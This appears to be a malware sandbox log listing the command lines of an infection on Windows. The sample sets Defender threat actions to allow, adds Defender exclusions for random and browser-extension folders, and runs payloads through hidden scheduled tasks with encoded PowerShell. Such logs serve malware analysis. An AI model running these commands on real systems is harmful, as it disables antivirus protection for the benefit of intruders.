"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gyNyvcpze" /SC once /ST 01:28:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gyNyvcpze"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gyNyvcpze"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:50:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe\" y7 /eRxJdidez 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "WKALCIrwIEiqhKBsn"

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe y7 /eRxJdidez 385118 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5904 -ip 5904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 1108

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

